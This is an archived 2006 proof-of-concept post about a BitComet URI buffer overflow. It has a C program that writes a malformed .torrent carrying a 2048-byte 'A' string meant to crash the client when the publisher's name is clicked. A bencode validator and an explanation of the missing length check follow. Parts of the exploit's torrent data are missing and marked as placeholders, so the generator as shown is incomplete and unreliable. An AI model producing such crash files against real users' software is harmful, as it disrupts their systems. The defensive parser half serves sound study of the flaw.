BitComet URI Proof of Concept

Date: Sun Jan 22 2006 - 18:09:41 CST

#include <windows.h>
#include <stdio.h>

/*
 * .::[ BitComet URI Buffer Overflow ]::.
 *
 * A vulnerability in BitComet allows remote attackers to construct a special .torrent file and put
 * it on any BitTorrent publishing web site. When a user downloads the .torrent file and clicks
 * on the publisher's name, BitComet will crash. An attacker can run arbitrary code on the victim's
 * host by means of a specially crafted .torrent file.
 *
 * .text:0056057B mov edx, [eax]
 * .text:0056057D push 0
 * .text:0056057F push esi
 * .text:00560580 mov ecx, eax
 * .text:00560582 call dword ptr [edx+9Ch] <--- bug occurs here
 *
 * [Credits]: Fortinet Research
 * [Notes]: I could only do DoS because the EAX and ECX were only controlled, and were separated by 0's.
 */

char bof[] =
        /* The lines that opened the bencoded dictionary and named the field that receives the
           oversized string did not survive the archived copy of this post; without them the file
           written below is not a complete torrent. */
        "10:created by13:BitComet/0.60"
        "13:creation datei1137897500e"
        "12:piece lengthi32768e";

char eof[] = "";  /* placeholder: the original closing string is missing from the archived post */

int main(int argc, char **argv) {
        FILE *fp;
        char buf[2048];

        printf("+---=[ BitComet URI Buffer Overflow ]=---+\n");
        printf("+---=[ Coded by DiGiTALSTAR ]=---+\n\n");

        printf("Opening torrent for writing... ");
        if (!(fp = fopen("comet.torrent", "wb"))) {
                perror("fopen");
                return 1;
        }
        printf("ok\n");

        /* 2048 bytes of 'A' (0x41) form the oversized string value. */
        memset(buf, '\x41', sizeof(buf));

        printf("Writing torrent data... ");
        /* The bodies of the original write checks were lost with the archive; each write is
           checked against the number of bytes it was asked to emit. */
        if (fwrite(bof, 1, sizeof(bof)-1, fp) != sizeof(bof)-1 ||
            fprintf(fp, "%u:", (unsigned)sizeof(buf)) <= 0 ||   /* bencode length prefix */
            fwrite(buf, 1, sizeof(buf), fp) != sizeof(buf) ||
            fwrite(eof, 1, sizeof(eof)-1, fp) != sizeof(eof)-1) {
                perror("write");
                fclose(fp);
                return 1;
        }
        printf("ok\n");
        fclose(fp);

        printf("Now open the torrent in bitcomet and click test\n");

        return 0;
}
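The crash described in the comment block comes down to a length-prefixed bencode string being accepted at face value by the consumer. As an added example (not code from the original post or from BitComet), the validating walker below refuses any string whose length prefix exceeds the bytes actually present in the document, or an assumed per-field maximum (MAX_FIELD, set to 256 here); the sample documents, the key name "sample" and that limit are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of validating one bencoded document. */
enum bres { B_OK = 0, B_TRUNCATED, B_BAD_LENGTH, B_TOO_LONG, B_BAD_TOKEN, B_TOO_DEEP };

/* Parse the decimal length prefix "NNN:" at buf[*pos]; on success *pos is just past the colon.
 * Rejects a missing number, a missing colon and a value that would overflow size_t. */
static enum bres read_length(const unsigned char *buf, size_t n, size_t *pos, size_t *len)
{
    size_t v = 0, start = *pos;
    while (*pos < n && buf[*pos] >= '0' && buf[*pos] <= '9') {
        unsigned d = buf[*pos] - '0';
        if (v > (SIZE_MAX - d) / 10) return B_BAD_LENGTH;
        v = v * 10 + d;
        (*pos)++;
    }
    if (*pos == start || *pos >= n || buf[*pos] != ':') return B_BAD_TOKEN;
    (*pos)++;
    *len = v;
    return B_OK;
}

/* Validate one bencoded value at buf[*pos]. Every byte string must fit in the remaining input
 * and under max_str, so a length prefix is never trusted beyond the bytes that are really there,
 * nor beyond what the consumer is prepared to hold. */
static enum bres walk(const unsigned char *buf, size_t n, size_t *pos, size_t max_str, int depth)
{
    if (depth > 32) return B_TOO_DEEP;
    if (*pos >= n) return B_TRUNCATED;
    unsigned char c = buf[*pos];
    if (c == 'i') {                                  /* integer: i<digits>e */
        (*pos)++;
        if (*pos < n && buf[*pos] == '-') (*pos)++;
        size_t start = *pos;
        while (*pos < n && buf[*pos] >= '0' && buf[*pos] <= '9') (*pos)++;
        if (*pos == start || *pos >= n || buf[*pos] != 'e') return B_BAD_TOKEN;
        (*pos)++;
        return B_OK;
    }
    if (c == 'l' || c == 'd') {                      /* list or dictionary, closed by 'e' */
        (*pos)++;
        while (*pos < n && buf[*pos] != 'e') {
            enum bres r;
            if (c == 'd') {                          /* a dictionary key must be a byte string */
                if (buf[*pos] < '0' || buf[*pos] > '9') return B_BAD_TOKEN;
                if ((r = walk(buf, n, pos, max_str, depth + 1)) != B_OK) return r;
            }
            if ((r = walk(buf, n, pos, max_str, depth + 1)) != B_OK) return r;
        }
        if (*pos >= n) return B_TRUNCATED;
        (*pos)++;
        return B_OK;
    }
    if (c >= '0' && c <= '9') {                      /* byte string: <len>:<bytes> */
        size_t len;
        enum bres r = read_length(buf, n, pos, &len);
        if (r != B_OK) return r;
        if (len > n - *pos) return B_TRUNCATED;      /* prefix claims bytes that are not there */
        if (len > max_str) return B_TOO_LONG;        /* present, but too large to hand on */
        *pos += len;
        return B_OK;
    }
    return B_BAD_TOKEN;
}

/* Validate a whole document: exactly one top-level value and nothing trailing. */
enum bres bencode_check(const unsigned char *buf, size_t n, size_t max_str)
{
    size_t pos = 0;
    enum bres r = walk(buf, n, &pos, max_str, 0);
    if (r != B_OK) return r;
    return pos == n ? B_OK : B_BAD_TOKEN;
}

/* Constructed samples (not from the original post). MAX_FIELD is an assumed display limit. */
#define MAX_FIELD 256
static const char SAMPLE_OK[] =
    "d10:created by13:BitComet/0.6013:creation datei1137897500e12:piece lengthi32768ee";

enum bres check_sample_ok(void)
{
    return bencode_check((const unsigned char *)SAMPLE_OK, sizeof SAMPLE_OK - 1, MAX_FIELD);
}

/* Honest length prefix, but a 2048-byte value under the constructed key "sample". */
enum bres check_sample_oversized(void)
{
    static unsigned char doc[2048 + 64];
    size_t n = (size_t)sprintf((char *)doc, "d6:sample2048:");
    memset(doc + n, 'A', 2048);
    n += 2048;
    doc[n++] = 'e';
    return bencode_check(doc, n, MAX_FIELD);
}

/* Length prefix larger than the bytes that follow it. */
enum bres check_sample_truncated(void)
{
    static const char doc[] = "d6:sample99999:shorte";
    return bencode_check((const unsigned char *)doc, sizeof doc - 1, MAX_FIELD);
}

int main(void)
{
    printf("well-formed: %d, oversized: %d, truncated: %d\n",
           check_sample_ok(), check_sample_oversized(), check_sample_truncated());
    return 0;
}
```

The two string checks do different jobs: the comparison against the remaining input stops a parser from reading past the end of the document, while the comparison against MAX_FIELD is the check a consumer with a fixed-size destination (a display label, a stack buffer) needs before it copies anything, and it is the one whose absence turns a long publisher field into a crash.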